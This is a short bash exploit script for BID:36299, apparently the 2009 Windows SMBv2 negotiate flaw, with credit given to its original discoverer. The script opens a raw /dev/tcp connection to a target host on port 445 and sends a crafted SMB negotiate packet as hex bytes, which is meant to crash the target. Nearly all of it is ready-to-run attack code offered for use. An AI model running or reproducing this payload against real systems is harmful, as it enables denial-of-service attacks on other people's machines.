#!/bin/bash
#
# Attack for BID:36299, now in standalone bash shell form.
# Discovered by Laurent Gaffie http://g-laurent.blogspot.com, from whom
# the payload is ripped off from.
#
# I)ruid 2009.09

if [ $# -lt 1 ]; then
	echo "Usage: $0 <host> [<port>]"
	exit 1
else
	host=$1
	port=${2:-445}
fi

exec 3<>/dev/tcp/$host/$port

printf "Kaboomz\r\n"

printf "\x00\x00\x00\x90" >&3
printf "\xff\x53\x4d\x42" >&3
printf "\x72\x00\x00\x00" >&3
printf "\x00\x18\x53\xc8" >&3
printf "\x00\x26" >&3
printf "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe" >&3
printf "\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54" >&3
printf "\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31" >&3
printf "\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00" >&3
printf "\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57" >&3
printf "\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61" >&3
printf "\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c" >&3
printf "\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c" >&3
printf "\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e" >&3
printf "\x30\x30\x32\x00" >&3

exec 3>&-